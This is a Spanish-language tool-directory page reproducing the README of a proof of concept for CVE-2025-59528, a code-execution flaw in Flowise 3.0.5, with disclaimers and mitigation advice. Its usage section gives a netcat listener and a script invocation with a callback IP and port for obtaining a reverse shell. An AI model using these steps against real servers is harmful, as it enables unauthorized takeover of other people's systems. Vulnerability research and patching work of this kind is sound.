Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sonnelon/cve-2025-59528-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

El PoC de CVE-2025-59528

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-59528 PoC

Prueba de concepto para investigar CVE-2025-59528 en un entorno de laboratorio aislado.

[!WARNING] DESCARGO DE RESPONSABILIDAD

Este proyecto está destinado estrictamente a fines educativos, investigación de seguridad y pruebas de sistemas que usted posee o para los que cuenta con autorización explícita para realizar pruebas.

No utilice este PoC contra servidores de terceros, servicios públicos o infraestructura sin el permiso del propietario.

El autor no se hace responsable de daños, pérdida de datos, interrupción del servicio o consecuencias legales derivadas del uso indebido de este proyecto.

Descripción

Este PoC demuestra el impacto potencial de CVE-2025-59528, una vulnerabilidad que involucra el procesamiento de mcpServerConfig controlado por el usuario en Flowise.

Bajo ciertas condiciones, la vulnerabilidad puede permitir a un atacante ejecutar código JavaScript arbitrario en el contexto del lado del servidor.

Versiones Afectadas

  • Flowise 3.0.5

Versión Corregida

  • Flowise 3.0.6+

Verifique siempre la versión exacta de la instalación de destino antes de realizar las pruebas.

Requisitos

  • Python 3
  • requests
Descargar herramienta
  • Una instancia de prueba local o aislada de Flowise
  • Una cuenta autorizada con los permisos necesarios
  • Instale la dependencia de Python:

    root@kitploit:~
    pip install requests
    

    Uso

    Ejecute netcat para obtener una shell:

    root@kitploit:~
    nc -lvnp <YOUR_PORT>
    

    Ejecute el PoC con:

    root@kitploit:~
    python3 poc.py \
        -t http://TARGET:PORT \
        -o api_key \
        -i CALLBACK_IP \
        -p CALLBACK_PORT
    

    Argumentos

    ArgumentDescription
    -t, --targetURL de la instancia de prueba de Flowise
    -o, --api_keyClave de API
    -i, --ipDirección IP de la máquina de pruebas
    -p, --portPuerto utilizado por el entorno de pruebas

    Configuración del Laboratorio

    Las pruebas deben realizarse dentro de una red virtual o de laboratorio aislada.

    root@kitploit:~
    ┌──────────────────┐
    │    PoC Machine   │
    │                  │
    │    Python PoC    │
    └────────┬─────────┘
             │
             │ Isolated Network
             │
    ┌────────▼─────────┐
    │   Flowise 3.0.5  │
    │   Test Instance  │
    └──────────────────┘
    

    No exponga una instancia de Flowise intencionalmente vulnerable directamente a Internet público.

    Mitigación

    Si está ejecutando una versión afectada de Flowise:

    1. Actualice Flowise a una versión parcheada.
    2. Restrinja el acceso a las API administrativas.
    3. Evite otorgar a usuarios no confiables permisos necesarios para acceder a funcionalidades vulnerables.
    4. Revise los registros del servidor para detectar solicitudes sospechosas.
    5. Vuelva a probar la instalación después de actualizar.

    Referencias

    • CVE: CVE-2025-59528
    • Software afectado: Flowise
    • Versión corregida: 3.0.6+

    Aviso Legal

    Al usar este proyecto, usted reconoce que es el único responsable de cumplir con todas las leyes y regulaciones aplicables.

    Use este PoC únicamente contra sistemas que le pertenezcan o sistemas para los cuales tenga autorización explícita para realizar pruebas de seguridad.